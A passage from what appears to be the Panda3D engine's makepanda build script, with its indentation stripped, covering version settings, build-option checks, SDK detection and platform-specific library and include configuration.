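# leaves CFLAGS == "-march=native -g -O2" and CXXFLAGS == " -g -O2" after the
# block above; both strings are later appended to GCC compile commands (see
# CompileCxx below).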
########################################################################
##
## Configure things based on the command-line parameters.
##
########################################################################
PLUGIN_VERSION = ParsePluginVersion("dtool/PandaVersion.pp")
COREAPI_VERSION = PLUGIN_VERSION + "." + ParseCoreapiVersion("dtool/PandaVersion.pp")
if VERSION is None:
if RUNTIME:
VERSION = PLUGIN_VERSION
else:
# Take the value from the setup.cfg file.
VERSION = GetMetadataValue('version')
if WHLVERSION is None:
WHLVERSION = VERSION
print("Version: %s" % VERSION)
if RUNTIME or RTDIST:
print("Core API Version: %s" % COREAPI_VERSION)
if DEBVERSION is None:
DEBVERSION = VERSION
MAJOR_VERSION = '.'.join(VERSION.split('.')[:2])
if P3DSUFFIX is None:
P3DSUFFIX = MAJOR_VERSION
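# Worked example (illustrative version number): with VERSION == "1.9.4",
# MAJOR_VERSION becomes "1.9", DEBVERSION defaults to "1.9.4" and P3DSUFFIX
# defaults to "1.9".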
outputdir_suffix = ""
if (RUNTIME or RTDIST):
# Compiling Maya/Max support is pointless in an rtdist build
for ver in MAYAVERSIONS + MAXVERSIONS:
PkgDisable(ver)
if (DISTRIBUTOR.strip() == ""):
exit("You must provide a valid distributor name when making a runtime or rtdist build!")
outputdir_suffix += "_" + DISTRIBUTOR.strip()
if (RUNTIME):
outputdir_suffix += "_rt"
if DISTRIBUTOR == "":
DISTRIBUTOR = "makepanda"
elif not RTDIST_VERSION:
RTDIST_VERSION = DISTRIBUTOR.strip() + "_" + MAJOR_VERSION
if not RTDIST_VERSION:
RTDIST_VERSION = "dev"
if not IsCustomOutputDir():
if GetTarget() == "windows" and GetTargetArch() == 'x64':
outputdir_suffix += '_x64'
SetOutputDir("built" + outputdir_suffix)
if (RUNTIME):
for pkg in PkgListGet():
if pkg in ["GTK2", "MFC"]:
# Optional package(s) for runtime.
pass
elif pkg in ["OPENSSL", "ZLIB"]:
# Required packages for runtime.
if (PkgSkip(pkg)==1):
exit("Runtime must be compiled with OpenSSL and ZLib support!")
else:
# Unused packages for runtime.
PkgDisable(pkg)
if (INSTALLER and RTDIST):
exit("Cannot build an installer for the rtdist build!")
if (WHEEL and RUNTIME):
exit("Cannot build a wheel for the runtime build!")
if (WHEEL and RTDIST):
exit("Cannot build a wheel for the rtdist build!")
if (INSTALLER) and (PkgSkip("PYTHON")) and (not RUNTIME) and GetTarget() == 'windows':
exit("Cannot build installer on Windows without python")
if WHEEL and PkgSkip("PYTHON"):
exit("Cannot build wheel without Python")
if (RTDIST) and (PkgSkip("WX") and PkgSkip("FLTK")):
exit("Cannot build rtdist without wx or fltk")
if (RUNTIME):
SetLinkAllStatic(True)
if not os.path.isdir("contrib"):
PkgDisable("CONTRIB")
########################################################################
##
## Load the dependency cache.
##
########################################################################
LoadDependencyCache()
########################################################################
##
## Locate various SDKs.
##
########################################################################
MakeBuildTree()
SdkLocateDirectX(STRDXSDKVERSION)
SdkLocateMaya()
SdkLocateMax()
SdkLocateMacOSX(OSXTARGET)
SdkLocatePython(RTDIST)
SdkLocateWindows(WINDOWS_SDK)
SdkLocatePhysX()
SdkLocateSpeedTree()
SdkLocateAndroid()
SdkAutoDisableDirectX()
SdkAutoDisableMaya()
SdkAutoDisableMax()
SdkAutoDisablePhysX()
SdkAutoDisableSpeedTree()
if RTDIST and DISTRIBUTOR == "cmu":
# Some validation checks for the CMU builds.
if (RTDIST_VERSION == "cmu_1.7" and SDK["PYTHONVERSION"] != "python2.6"):
exit("The CMU 1.7 runtime distribution must be built against Python 2.6!")
elif (RTDIST_VERSION == "cmu_1.8" and SDK["PYTHONVERSION"] != "python2.7"):
exit("The CMU 1.8 runtime distribution must be built against Python 2.7!")
elif (RTDIST_VERSION == "cmu_1.9" and SDK["PYTHONVERSION"] != "python2.7"):
exit("The CMU 1.9 runtime distribution must be built against Python 2.7!")
if RTDIST and not HOST_URL:
exit("You must specify a host URL when building the rtdist!")
if RUNTIME and not HOST_URL:
# Set this to a nice default.
HOST_URL = "https://runtime.panda3d.org/"
########################################################################
##
## Choose a Compiler.
##
## This should also set up any environment variables needed to make
## the compiler work.
##
########################################################################
if GetHost() == 'windows' and GetTarget() == 'windows':
COMPILER = "MSVC"
SdkLocateVisualStudio(MSVC_VERSION)
else:
COMPILER = "GCC"
SetupBuildEnvironment(COMPILER)
########################################################################
##
## External includes, external libraries, and external defsyms.
##
########################################################################
IncDirectory("ALWAYS", GetOutputDir()+"/tmp")
IncDirectory("ALWAYS", GetOutputDir()+"/include")
if (COMPILER == "MSVC"):
PkgDisable("X11")
PkgDisable("GLES")
PkgDisable("GLES2")
PkgDisable("EGL")
PkgDisable("CARBON")
PkgDisable("COCOA")
DefSymbol("FLEX", "YY_NO_UNISTD_H")
if (PkgSkip("PYTHON")==0):
IncDirectory("ALWAYS", SDK["PYTHON"] + "/include")
LibDirectory("ALWAYS", SDK["PYTHON"] + "/libs")
SmartPkgEnable("EIGEN", "eigen3", (), ("Eigen/Dense",), target_pkg = 'ALWAYS')
for pkg in PkgListGet():
if (PkgSkip(pkg)==0):
if (pkg[:4]=="MAYA"):
IncDirectory(pkg, SDK[pkg] + "/include")
DefSymbol(pkg, "MAYAVERSION", pkg)
DefSymbol(pkg, "MLIBRARY_DONTUSE_MFC_MANIFEST", "")
elif (pkg[:3]=="MAX"):
IncDirectory(pkg, SDK[pkg] + "/include")
IncDirectory(pkg, SDK[pkg] + "/include/CS")
IncDirectory(pkg, SDK[pkg+"CS"] + "/include")
IncDirectory(pkg, SDK[pkg+"CS"] + "/include/CS")
DefSymbol(pkg, "MAX", pkg)
if (int(pkg[3:]) >= 2013):
DefSymbol(pkg, "UNICODE", "")
DefSymbol(pkg, "_UNICODE", "")
elif (pkg[:2]=="DX"):
IncDirectory(pkg, SDK[pkg] + "/include")
elif GetThirdpartyDir() is not None:
IncDirectory(pkg, GetThirdpartyDir() + pkg.lower() + "/include")
for pkg in DXVERSIONS:
if (PkgSkip(pkg)==0):
vnum=pkg[2:]
if GetTargetArch() == 'x64':
LibDirectory(pkg, SDK[pkg] + '/lib/x64')
else:
LibDirectory(pkg, SDK[pkg] + '/lib/x86')
LibDirectory(pkg, SDK[pkg] + '/lib')
LibName(pkg, 'd3dVNUM.lib'.replace("VNUM", vnum))
LibName(pkg, 'd3dxVNUM.lib'.replace("VNUM", vnum))
if int(vnum) >= 9 and "GENERIC_DXERR_LIBRARY" in SDK:
LibName(pkg, 'dxerr.lib')
else:
LibName(pkg, 'dxerrVNUM.lib'.replace("VNUM", vnum))
#LibName(pkg, 'ddraw.lib')
LibName(pkg, 'dxguid.lib')
if SDK.get("VISUALSTUDIO_VERSION") >= (14,0):
# dxerr needs this for __vsnwprintf definition.
LibName(pkg, 'legacy_stdio_definitions.lib')
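# Worked example: for pkg == "DX9" the VNUM substitutions above resolve to
# d3d9.lib and d3dx9.lib, plus dxguid.lib and either dxerr.lib (when the SDK
# provides the generic error library) or dxerr9.lib.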
if not PkgSkip("FREETYPE") and os.path.isdir(GetThirdpartyDir() + "freetype/include/freetype2"):
IncDirectory("FREETYPE", GetThirdpartyDir() + "freetype/include/freetype2")
IncDirectory("ALWAYS", GetThirdpartyDir() + "extras/include")
LibName("WINSOCK", "wsock32.lib")
LibName("WINSOCK2", "wsock32.lib")
LibName("WINSOCK2", "ws2_32.lib")
LibName("WINCOMCTL", "comctl32.lib")
LibName("WINCOMDLG", "comdlg32.lib")
LibName("WINUSER", "user32.lib")
LibName("WINMM", "winmm.lib")
LibName("WINIMM", "imm32.lib")
LibName("WINKERNEL", "kernel32.lib")
LibName("WINOLE", "ole32.lib")
LibName("WINOLEAUT", "oleaut32.lib")
LibName("WINOLDNAMES", "oldnames.lib")
LibName("WINSHELL", "shell32.lib")
LibName("WINGDI", "gdi32.lib")
LibName("ADVAPI", "advapi32.lib")
LibName("IPHLPAPI", "iphlpapi.lib")
LibName("GL", "opengl32.lib")
LibName("GLES", "libgles_cm.lib")
LibName("GLES2", "libGLESv2.lib")
LibName("EGL", "libEGL.lib")
LibName("MSIMG", "msimg32.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "strmiids.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "quartz.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "odbc32.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "odbccp32.lib")
if (PkgSkip("OPENSSL")==0):
if os.path.isfile(GetThirdpartyDir() + "openssl/lib/libpandassl.lib"):
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libpandassl.lib")
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libpandaeay.lib")
else:
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libeay32.lib")
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/ssleay32.lib")
if (PkgSkip("PNG")==0):
if os.path.isfile(GetThirdpartyDir() + "png/lib/libpng16_static.lib"):
LibName("PNG", GetThirdpartyDir() + "png/lib/libpng16_static.lib")
else:
LibName("PNG", GetThirdpartyDir() + "png/lib/libpng_static.lib")
if (PkgSkip("TIFF")==0):
if os.path.isfile(GetThirdpartyDir() + "tiff/lib/libtiff.lib"):
LibName("TIFF", GetThirdpartyDir() + "tiff/lib/libtiff.lib")
else:
LibName("TIFF", GetThirdpartyDir() + "tiff/lib/tiff.lib")
if (PkgSkip("OPENEXR")==0):
suffix = ""
if os.path.isfile(GetThirdpartyDir() + "openexr/lib/IlmImf-2_2.lib"):
suffix = "-2_2"
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/IlmImf" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/IlmThread" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/Iex" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/Half.lib")
IncDirectory("OPENEXR", GetThirdpartyDir() + "openexr/include/OpenEXR")
if (PkgSkip("JPEG")==0): LibName("JPEG", GetThirdpartyDir() + "jpeg/lib/jpeg-static.lib")
if (PkgSkip("ZLIB")==0): LibName("ZLIB", GetThirdpartyDir() + "zlib/lib/zlibstatic.lib")
if (PkgSkip("VRPN")==0): LibName("VRPN", GetThirdpartyDir() + "vrpn/lib/vrpn.lib")
if (PkgSkip("VRPN")==0): LibName("VRPN", GetThirdpartyDir() + "vrpn/lib/quat.lib")
if (PkgSkip("NVIDIACG")==0): LibName("CGGL", GetThirdpartyDir() + "nvidiacg/lib/cgGL.lib")
if (PkgSkip("NVIDIACG")==0): LibName("CGDX9", GetThirdpartyDir() + "nvidiacg/lib/cgD3D9.lib")
if (PkgSkip("NVIDIACG")==0): LibName("NVIDIACG", GetThirdpartyDir() + "nvidiacg/lib/cg.lib")
if (PkgSkip("FREETYPE")==0): LibName("FREETYPE", GetThirdpartyDir() + "freetype/lib/freetype.lib")
if (PkgSkip("HARFBUZZ")==0):
LibName("HARFBUZZ", GetThirdpartyDir() + "harfbuzz/lib/harfbuzz.lib")
IncDirectory("HARFBUZZ", GetThirdpartyDir() + "harfbuzz/include/harfbuzz")
if (PkgSkip("FFTW")==0): LibName("FFTW", GetThirdpartyDir() + "fftw/lib/fftw3.lib")
if (PkgSkip("ARTOOLKIT")==0):LibName("ARTOOLKIT",GetThirdpartyDir() + "artoolkit/lib/libAR.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cv.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/highgui.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cvaux.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/ml.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cxcore.lib")
if (PkgSkip("AWESOMIUM")==0):LibName("AWESOMIUM",GetThirdpartyDir() + "awesomium/lib/Awesomium.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avcodec.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avformat.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avutil.lib")
if (PkgSkip("SWSCALE")==0): LibName("SWSCALE", GetThirdpartyDir() + "ffmpeg/lib/swscale.lib")
if (PkgSkip("SWRESAMPLE")==0):LibName("SWRESAMPLE",GetThirdpartyDir() + "ffmpeg/lib/swresample.lib")
if (PkgSkip("FCOLLADA")==0):
LibName("FCOLLADA", GetThirdpartyDir() + "fcollada/lib/FCollada.lib")
IncDirectory("FCOLLADA", GetThirdpartyDir() + "fcollada/include/FCollada")
if (PkgSkip("ASSIMP")==0):
LibName("ASSIMP", GetThirdpartyDir() + "assimp/lib/assimp.lib")
IncDirectory("ASSIMP", GetThirdpartyDir() + "assimp/include/assimp")
if (PkgSkip("SQUISH")==0):
if GetOptimize() <= 2:
LibName("SQUISH", GetThirdpartyDir() + "squish/lib/squishd.lib")
else:
LibName("SQUISH", GetThirdpartyDir() + "squish/lib/squish.lib")
if (PkgSkip("ROCKET")==0):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketCore.lib")
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketControls.lib")
if (PkgSkip("PYTHON")==0):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/" + SDK["PYTHONVERSION"] + "/boost_python-vc100-mt-1_54.lib")
if (GetOptimize() <= 3):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketDebugger.lib")
if (PkgSkip("OPENAL")==0):
LibName("OPENAL", GetThirdpartyDir() + "openal/lib/OpenAL32.lib")
if not os.path.isfile(GetThirdpartyDir() + "openal/bin/OpenAL32.dll"):
# Link OpenAL Soft statically.
DefSymbol("OPENAL", "AL_LIBTYPE_STATIC")
if (PkgSkip("ODE")==0):
LibName("ODE", GetThirdpartyDir() + "ode/lib/ode_single.lib")
DefSymbol("ODE", "dSINGLE", "")
if (PkgSkip("FMODEX")==0):
if (GetTargetArch() == 'x64'):
LibName("FMODEX", GetThirdpartyDir() + "fmodex/lib/fmodex64_vc.lib")
else:
LibName("FMODEX", GetThirdpartyDir() + "fmodex/lib/fmodex_vc.lib")
if (PkgSkip("FLTK")==0 and RTDIST):
LibName("FLTK", GetThirdpartyDir() + "fltk/lib/fltk.lib")
if not PkgSkip("FLTK"):
# If we have fltk, we don't need wx
PkgDisable("WX")
if (PkgSkip("WX")==0 and RTDIST):
LibName("WX", GetThirdpartyDir() + "wx/lib/wxbase28u.lib")
LibName("WX", GetThirdpartyDir() + "wx/lib/wxmsw28u_core.lib")
DefSymbol("WX", "__WXMSW__", "")
DefSymbol("WX", "_UNICODE", "")
DefSymbol("WX", "UNICODE", "")
if (PkgSkip("VORBIS")==0):
for lib in ('ogg', 'vorbis', 'vorbisfile'):
path = GetThirdpartyDir() + "vorbis/lib/lib{0}_static.lib".format(lib)
if not os.path.isfile(path):
path = GetThirdpartyDir() + "vorbis/lib/{0}.lib".format(lib)
LibName("VORBIS", path)
if (PkgSkip("OPUS")==0):
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libogg_static.lib")
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libopus_static.lib")
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libopusfile_static.lib")
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0):
LibName(pkg, '"' + SDK[pkg] + '/lib/Foundation.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMaya.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMayaAnim.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMayaUI.lib"')
for pkg in MAXVERSIONS:
if (PkgSkip(pkg)==0):
LibName(pkg, SDK[pkg] + '/lib/core.lib')
LibName(pkg, SDK[pkg] + '/lib/edmodel.lib')
LibName(pkg, SDK[pkg] + '/lib/gfx.lib')
LibName(pkg, SDK[pkg] + '/lib/geom.lib')
LibName(pkg, SDK[pkg] + '/lib/mesh.lib')
LibName(pkg, SDK[pkg] + '/lib/maxutil.lib')
LibName(pkg, SDK[pkg] + '/lib/paramblk2.lib')
if (PkgSkip("PHYSX")==0):
if GetTargetArch() == 'x64':
LibName("PHYSX", SDK["PHYSXLIBS"] + "/PhysXLoader64.lib")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/NxCharacter64.lib")
else:
LibName("PHYSX", SDK["PHYSXLIBS"] + "/PhysXLoader.lib")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/NxCharacter.lib")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Physics/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/PhysXLoader/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxCharacter/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxExtensions/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Foundation/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Cooking/include")
if (PkgSkip("SPEEDTREE")==0):
if GetTargetArch() == 'x64':
libdir = SDK["SPEEDTREE"] + "/Lib/Windows/VC10.x64/"
p64ext = '64'
else:
libdir = SDK["SPEEDTREE"] + "/Lib/Windows/VC10/"
p64ext = ''
debugext = ''
if (GetOptimize() <= 2): debugext = "_d"
libsuffix = "_v%s_VC100MT%s_Static%s.lib" % (
SDK["SPEEDTREEVERSION"], p64ext, debugext)
LibName("SPEEDTREE", "%sSpeedTreeCore%s" % (libdir, libsuffix))
LibName("SPEEDTREE", "%sSpeedTreeForest%s" % (libdir, libsuffix))
LibName("SPEEDTREE", "%sSpeedTree%sRenderer%s" % (libdir, SDK["SPEEDTREEAPI"], libsuffix))
LibName("SPEEDTREE", "%sSpeedTreeRenderInterface%s" % (libdir, libsuffix))
if (SDK["SPEEDTREEAPI"] == "OpenGL"):
LibName("SPEEDTREE", "%sglew32.lib" % (libdir))
LibName("SPEEDTREE", "glu32.lib")
IncDirectory("SPEEDTREE", SDK["SPEEDTREE"] + "/Include")
if (PkgSkip("BULLET")==0):
suffix = '.lib'
if GetTargetArch() == 'x64' and os.path.isfile(GetThirdpartyDir() + "bullet/lib/BulletCollision_x64.lib"):
suffix = '_x64.lib'
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/LinearMath" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletCollision" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletDynamics" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletSoftBody" + suffix)
if (COMPILER=="GCC"):
PkgDisable("AWESOMIUM")
if GetTarget() != "darwin":
PkgDisable("CARBON")
PkgDisable("COCOA")
elif RUNTIME:
# We don't support Cocoa in the runtime yet.
PkgDisable("COCOA")
if 'x86_64' in OSX_ARCHS:
# 64-bits OS X doesn't have Carbon.
PkgDisable("CARBON")
#if (PkgSkip("PYTHON")==0):
# IncDirectory("PYTHON", SDK["PYTHON"])
if (GetHost() == "darwin"):
if (PkgSkip("FREETYPE")==0 and not os.path.isdir(GetThirdpartyDir() + 'freetype')):
IncDirectory("FREETYPE", "/usr/X11/include")
IncDirectory("FREETYPE", "/usr/X11/include/freetype2")
LibDirectory("FREETYPE", "/usr/X11/lib")
if (GetHost() == "freebsd"):
IncDirectory("ALWAYS", "/usr/local/include")
LibDirectory("ALWAYS", "/usr/local/lib")
if (os.path.isdir("/usr/PCBSD")):
IncDirectory("ALWAYS", "/usr/PCBSD/local/include")
LibDirectory("ALWAYS", "/usr/PCBSD/local/lib")
if GetTarget() != "windows":
PkgDisable("DIRECTCAM")
fcollada_libs = ("FColladaD", "FColladaSD", "FColladaS")
# WARNING! The order of the ffmpeg libraries matters!
ffmpeg_libs = ("libavformat", "libavcodec", "libavutil")
# Name pkg-config libs, include(dir)s
if (not RUNTIME):
SmartPkgEnable("EIGEN", "eigen3", (), ("Eigen/Dense",), target_pkg = 'ALWAYS')
SmartPkgEnable("ARTOOLKIT", "", ("AR"), "AR/ar.h")
SmartPkgEnable("FCOLLADA", "", ChooseLib(fcollada_libs, "FCOLLADA"), ("FCollada", "FCollada/FCollada.h"))
SmartPkgEnable("ASSIMP", "", ("assimp"), "assimp")
SmartPkgEnable("FFMPEG", ffmpeg_libs, ffmpeg_libs, ("libavformat/avformat.h", "libavcodec/avcodec.h", "libavutil/avutil.h"))
SmartPkgEnable("SWSCALE", "libswscale", "libswscale", ("libswscale/swscale.h"), target_pkg = "FFMPEG", thirdparty_dir = "ffmpeg")
SmartPkgEnable("SWRESAMPLE","libswresample", "libswresample", ("libswresample/swresample.h"), target_pkg = "FFMPEG", thirdparty_dir = "ffmpeg")
SmartPkgEnable("FFTW", "", ("fftw3"), ("fftw.h"))
SmartPkgEnable("FMODEX", "", ("fmodex"), ("fmodex", "fmodex/fmod.h"))
SmartPkgEnable("FREETYPE", "freetype2", ("freetype"), ("freetype2", "freetype2/freetype/freetype.h"))
SmartPkgEnable("HARFBUZZ", "harfbuzz", ("harfbuzz"), ("harfbuzz", "harfbuzz/hb-ft.h"))
SmartPkgEnable("GL", "gl", ("GL"), ("GL/gl.h"), framework = "OpenGL")
SmartPkgEnable("GLES", "glesv1_cm", ("GLESv1_CM"), ("GLES/gl.h"), framework = "OpenGLES")
SmartPkgEnable("GLES2", "glesv2", ("GLESv2"), ("GLES2/gl2.h")) #framework = "OpenGLES"?
SmartPkgEnable("EGL", "egl", ("EGL"), ("EGL/egl.h"))
SmartPkgEnable("NVIDIACG", "", ("Cg"), "Cg/cg.h", framework = "Cg")
SmartPkgEnable("ODE", "", ("ode"), "ode/ode.h", tool = "ode-config")
SmartPkgEnable("OPENAL", "openal", ("openal"), "AL/al.h", framework = "OpenAL")
SmartPkgEnable("SQUISH", "", ("squish"), "squish.h")
SmartPkgEnable("TIFF", "libtiff-4", ("tiff"), "tiff.h")
SmartPkgEnable("OPENEXR", "OpenEXR", ("IlmImf", "Imath", "Half", "Iex", "IexMath", "IlmThread"), ("OpenEXR", "OpenEXR/ImfOutputFile.h"))
SmartPkgEnable("VRPN", "", ("vrpn", "quat"), ("vrpn", "quat.h", "vrpn/vrpn_Types.h"))
SmartPkgEnable("BULLET", "bullet", ("BulletSoftBody", "BulletDynamics", "BulletCollision", "LinearMath"), ("bullet", "bullet/btBulletDynamicsCommon.h"))
SmartPkgEnable("VORBIS", "vorbisfile",("vorbisfile", "vorbis", "ogg"), ("ogg/ogg.h", "vorbis/vorbisfile.h"))
SmartPkgEnable("OPUS", "opusfile", ("opusfile", "opus", "ogg"), ("ogg/ogg.h", "opus/opusfile.h", "opus"))
SmartPkgEnable("JPEG", "", ("jpeg"), "jpeglib.h")
SmartPkgEnable("PNG", "libpng", ("png"), "png.h", tool = "libpng-config")
if not PkgSkip("FFMPEG"):
if GetTarget() == "darwin":
LibName("FFMPEG", "-Wl,-read_only_relocs,suppress")
LibName("FFMPEG", "-framework VideoDecodeAcceleration")
elif os.path.isfile(GetThirdpartyDir() + "ffmpeg/lib/libavcodec.a"):
# Needed when linking ffmpeg statically on Linux.
LibName("FFMPEG", "-Wl,-Bsymbolic")
if PkgSkip("FFMPEG") or GetTarget() == "darwin":
cv_lib = ChooseLib(("opencv_core", "cv"), "OPENCV")
if cv_lib == "opencv_core":
OPENCV_VER_23 = True
SmartPkgEnable("OPENCV", "opencv", ("opencv_core", "opencv_highgui"), ("opencv2/core/core.hpp"))
else:
SmartPkgEnable("OPENCV", "opencv", ("cv", "highgui", "cvaux", "ml", "cxcore"),
("opencv", "opencv/cv.h", "opencv/cxcore.h", "opencv/highgui.h"))
else:
PkgDisable("OPENCV")
rocket_libs = ("RocketCore", "RocketControls")
if (GetOptimize() <= 3):
rocket_libs += ("RocketDebugger",)
rocket_libs += ("boost_python",)
SmartPkgEnable("ROCKET", "", rocket_libs, "Rocket/Core.h")
if not PkgSkip("PYTHON"):
python_lib = SDK["PYTHONVERSION"]
if not RTDIST and GetTarget() != 'android':
# We don't link anything in the SDK with libpython.
python_lib = ""
SmartPkgEnable("PYTHON", "", python_lib, (SDK["PYTHONVERSION"], SDK["PYTHONVERSION"] + "/Python.h"))
SmartPkgEnable("OPENSSL", "openssl", ("ssl", "crypto"), ("openssl/ssl.h", "openssl/crypto.h"))
SmartPkgEnable("ZLIB", "zlib", ("z"), "zlib.h")
SmartPkgEnable("GTK2", "gtk+-2.0")
if (RTDIST):
SmartPkgEnable("WX", tool = "wx-config")
SmartPkgEnable("FLTK", "", ("fltk"), ("FL/Fl.H"), tool = "fltk-config")
if GetTarget() != 'darwin':
# CgGL is covered by the Cg framework, and we don't need X11 components on OSX
if not PkgSkip("NVIDIACG") and not RUNTIME:
SmartPkgEnable("CGGL", "", ("CgGL"), "Cg/cgGL.h", thirdparty_dir = "nvidiacg")
if not RUNTIME:
SmartPkgEnable("X11", "x11", "X11", ("X11", "X11/Xlib.h", "X11/XKBlib.h"))
if GetHost() != "darwin":
# Workaround for an issue where pkg-config does not include this path
if GetTargetArch() in ("x86_64", "amd64"):
if (os.path.isdir("/usr/lib64/glib-2.0/include")):
IncDirectory("GTK2", "/usr/lib64/glib-2.0/include")
if (os.path.isdir("/usr/lib64/gtk-2.0/include")):
IncDirectory("GTK2", "/usr/lib64/gtk-2.0/include")
if not PkgSkip("X11"):
if (os.path.isdir("/usr/X11R6/lib64")):
LibDirectory("ALWAYS", "/usr/X11R6/lib64")
else:
LibDirectory("ALWAYS", "/usr/X11R6/lib")
elif not PkgSkip("X11"):
LibDirectory("ALWAYS", "/usr/X11R6/lib")
if RUNTIME:
# For the runtime, these packages are required
for pkg in ["OPENSSL", "ZLIB"]:
skips = []
if (pkg in PkgListGet() and PkgSkip(pkg)==1):
skips.append(pkg)
if skips:
exit("Runtime must be compiled with OpenSSL and ZLib support (missing %s)" % (', '.join(skips)))
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0 and (pkg in SDK)):
if (GetHost() == "darwin"):
# Sheesh, Autodesk really can't make up their mind
# regarding the location of the Maya devkit on OS X.
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/lib")):
LibDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/lib")
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/MacOS")):
LibDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/MacOS")
if (os.path.isdir(SDK[pkg] + "/lib")):
LibDirectory(pkg, SDK[pkg] + "/lib")
if (os.path.isdir(SDK[pkg] + "/Maya.app/Contents/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/Maya.app/Contents/include")
if (os.path.isdir(SDK[pkg] + "/devkit/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/devkit/include")
if (os.path.isdir(SDK[pkg] + "/include/maya")):
IncDirectory(pkg, SDK[pkg] + "/include")
else:
LibDirectory(pkg, SDK[pkg] + "/lib")
IncDirectory(pkg, SDK[pkg] + "/include")
DefSymbol(pkg, "MAYAVERSION", pkg)
if GetTarget() == 'darwin':
LibName("ALWAYS", "-framework AppKit")
if (PkgSkip("OPENCV")==0):
LibName("OPENCV", "-framework QuickTime")
LibName("AGL", "-framework AGL")
LibName("CARBON", "-framework Carbon")
LibName("COCOA", "-framework Cocoa")
# Fix for a bug in OSX Leopard:
LibName("GL", "-dylib_file /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib:/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib")
if GetTarget() == 'android':
LibName("ALWAYS", '-llog')
LibName("ANDROID", '-landroid')
LibName("JNIGRAPHICS", '-ljnigraphics')
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0 and (pkg in SDK)):
if GetTarget() == 'darwin':
LibName(pkg, "-Wl,-rpath," + SDK[pkg] + "/Maya.app/Contents/MacOS")
else:
LibName(pkg, "-Wl,-rpath," + SDK[pkg] + "/lib")
LibName(pkg, "-lOpenMaya")
LibName(pkg, "-lOpenMayaAnim")
LibName(pkg, "-lAnimSlice")
LibName(pkg, "-lDeformSlice")
LibName(pkg, "-lModifiers")
LibName(pkg, "-lDynSlice")
LibName(pkg, "-lKinSlice")
LibName(pkg, "-lModelSlice")
LibName(pkg, "-lNurbsSlice")
LibName(pkg, "-lPolySlice")
LibName(pkg, "-lProjectSlice")
LibName(pkg, "-lImage")
LibName(pkg, "-lShared")
LibName(pkg, "-lTranslators")
LibName(pkg, "-lDataModel")
LibName(pkg, "-lRenderModel")
LibName(pkg, "-lNurbsEngine")
LibName(pkg, "-lDependEngine")
LibName(pkg, "-lCommandEngine")
LibName(pkg, "-lFoundation")
LibName(pkg, "-lIMFbase")
if GetTarget() != 'darwin':
LibName(pkg, "-lOpenMayalib")
else:
LibName(pkg, "-dylib_file /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib:/System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib")
if (PkgSkip("PHYSX")==0):
IncDirectory("PHYSX", SDK["PHYSX"] + "/Physics/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/PhysXLoader/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxCharacter/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxExtensions/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Foundation/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Cooking/include")
